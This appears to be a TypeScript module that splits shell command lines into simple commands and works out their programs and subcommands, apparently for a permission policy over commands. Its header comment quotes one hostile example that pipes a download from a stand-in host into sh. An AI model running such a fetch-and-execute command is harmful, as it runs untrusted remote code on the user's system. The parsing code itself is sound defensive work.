/**
 * Shell command analysis for policy: split a command line into the simple commands it runs,
 * so 'npm test && curl evil.sh | sh' is judged as three commands, not one that starts with
 * 'npm test'. Not a full shell parser; it errs towards more parts, never fewer.
 */

const OPERATORS = ['&&', '||', ';;', ';', '|&', '|', '&', '\n', '\r'];

const count = (s: string, ch: string): number => s.split(ch).length - 1;

function tidy(part: string): string {
  let s = part.trim();
  // Subshells and groups: ( cmd ), { cmd; }. Only unbalanced brackets go.
  while (/^[({]\s*/.test(s)) s = s.replace(/^[({]\s*/, '');
  while ((s.endsWith(')') && count(s, ')') > count(s, '(')) || (s.endsWith('}') && count(s, '}') > count(s, '{'))) s = s.slice(0, -1).trimEnd();
  return s.replace(/[ \t]+/g, ' ').trim();
}

/** Read a $( ... ) body starting after '$(' at index i; returns [body, indexAfterClose]. */
function readParen(cmd: string, i: number): [string, number] {
  let depth = 1;
  let quote: string | null = null;
  const start = i;
  for (; i < cmd.length; i++) {
    const ch = cmd[i]!;
    if (quote) {
      if (ch === '\\' && quote === '"') i++;
      else if (ch === quote) quote = null;
      continue;
    }
    if (ch === '\\') {
      i++;
      continue;
    }
    if (ch === "'" || ch === '"') quote = ch;
    else if (ch === '(') depth++;
    else if (ch === ')' && --depth === 0) return [cmd.slice(start, i), i + 1];
  }
  return [cmd.slice(start), cmd.length];
}

/**
 * The simple commands in a command line, in order: split on ; && || | & and newlines outside
 * quotes, plus the bodies of $( ) and backtick substitutions (and of <( ) process
 * substitutions) as commands of their own.
 */
export function splitCommand(cmd: string): string[] {
  const parts: string[] = [];
  const extra: string[] = [];
  let cur = '';
  let quote: string | null = null;
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i]!;
    if (quote === "'") {
      cur += ch;
      if (ch === "'") quote = null;
      continue;
    }
    if (ch === '\\' && i + 1 < cmd.length) {
      cur += ch + cmd[i + 1];
      i++;
      continue;
    }
    if ((ch === '$' || ch === '<' || ch === '>') && cmd[i + 1] === '(') {
      const [inner, next] = readParen(cmd, i + 2);
      extra.push(...splitCommand(inner));
      cur += cmd.slice(i, next);
      i = next - 1;
      continue;
    }
    if (ch === '`') {
      const close = cmd.indexOf('`', i + 1);
      const end = close < 0 ? cmd.length : close;
      extra.push(...splitCommand(cmd.slice(i + 1, end)));
      cur += cmd.slice(i, end + 1);
      i = end;
      continue;
    }
    if (quote === '"') {
      cur += ch;
      if (ch === '"') quote = null;
      continue;
    }
    if (ch === "'" || ch === '"') {
      quote = ch;
      cur += ch;
      continue;
    }
    const op = OPERATORS.find((o) => cmd.startsWith(o, i));
    // '&' inside a redirection (2>&1, &>file, >&2) is not a separator.
    if (op === '&' && (cur.endsWith('>') || cmd[i + 1] === '>')) {
      cur += ch;
      continue;
    }
    if (op) {
      parts.push(cur);
      cur = '';
      i += op.length - 1;
      continue;
    }
    cur += ch;
  }
  parts.push(cur);
  return [...parts, ...extra].map(tidy).filter(Boolean);
}

/** What a backslash escapes inside double quotes (POSIX). */
const DQ_ESCAPES = '$`"\\\n';

/** Split one simple command into words, honouring quotes (quotes are removed). */
export function words(command: string): string[] {
  const out: string[] = [];
  let cur = '';
  let has = false;
  let quote: string | null = null;
  for (let i = 0; i < command.length; i++) {
    const ch = command[i]!;
    if (quote) {
      if (ch === quote) quote = null;
      else if (ch === '\\' && quote === '"' && i + 1 < command.length && DQ_ESCAPES.includes(command[i + 1]!)) {
        // In double quotes a backslash escapes only $ ` " \ and a newline (which it removes);
        // before anything else it stays, so "C:\Users\x" keeps its backslashes (live test, 19 Oct
        // 2026: a quoted Windows path read as C:Usersx, and a write outside the folder passed).
        const next = command[++i]!;
        if (next !== '\n') cur += next;
      } else cur += ch;
      continue;
    }
    if (ch === "'" || ch === '"') {
      quote = ch;
      has = true;
      continue;
    }
    if (ch === '\\' && i + 1 < command.length && !/[A-Za-z0-9_.-]/.test(command[i + 1]!)) {
      cur += command[++i];
      has = true;
      continue;
    }
    if (/\s/.test(ch)) {
      if (has || cur) out.push(cur);
      cur = '';
      has = false;
      continue;
    }
    cur += ch;
    has = true;
  }
  if (has || cur) out.push(cur);
  return out;
}

const WRAPPERS = new Set(['sudo', 'doas', 'command', 'exec', 'time', 'nohup', 'nice', 'env', 'builtin', 'xargs', 'timeout', 'stdbuf']);
/** Options that take the next word as their value, per program. */
const VALUE_OPTIONS: Record<string, Set<string>> = {
  sudo: new Set(['-u', '-g', '-C', '-D', '-h', '-p', '-r', '-t', '-U']),
  doas: new Set(['-u', '-C']),
  nice: new Set(['-n']),
  env: new Set(['-u', '-C', '-S']),
  timeout: new Set(['-s', '-k']),
  xargs: new Set(['-I', '-n', '-P', '-d', '-L', '-s', '-E']),
  git: new Set(['-C', '-c', '--git-dir', '--work-tree', '--namespace']),
  npm: new Set(['--prefix', '-w', '--workspace']),
  pnpm: new Set(['-C', '--dir', '--filter', '-F']),
  yarn: new Set(['--cwd']),
  docker: new Set(['-H', '--host', '--context', '-c', '--config']),
};

/** The first argument that is not an option (or an option's value): the subcommand. */
export function subcommandOf(program: string, args: string[]): string | undefined {
  const takes = VALUE_OPTIONS[program.toLowerCase()];
  for (let i = 0; i < args.length; i++) {
    const a = args[i]!;
    if (a.startsWith('-')) {
      if (takes?.has(a)) i++;
      continue;
    }
    return a;
  }
  return undefined;
}

/**
 * The program a simple command runs and its arguments, skipping VAR=value prefixes and
 * wrappers such as sudo, env, time and xargs. The program name loses its folder and a
 * Windows extension ('C:/x/git.exe' -> 'git').
 */
export function programOf(command: string): { program: string; args: string[]; wrappers: string[] } {
  const w = words(command);
  const wrappers: string[] = [];
  let i = 0;
  while (i < w.length) {
    const x = w[i]!;
    if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(x)) {
      i++;
      continue;
    }
    const base = x.toLowerCase();
    if (WRAPPERS.has(base)) {
      wrappers.push(base);
      i++;
      // Options of the wrapper itself (sudo -u root, timeout 10, nice -n 5).
      const takes = VALUE_OPTIONS[base];
      while (i < w.length && (w[i]!.startsWith('-') || (base === 'timeout' && /^\d/.test(w[i]!)))) {
        if (takes?.has(w[i]!)) i++;
        i++;
      }
      continue;
    }
    break;
  }
  const raw = w[i] ?? '';
  const program = raw.replace(/\\/g, '/').split('/').pop()!.replace(/\.(exe|cmd|bat|ps1)$/i, '');
  return { program, args: w.slice(i + 1), wrappers };
}
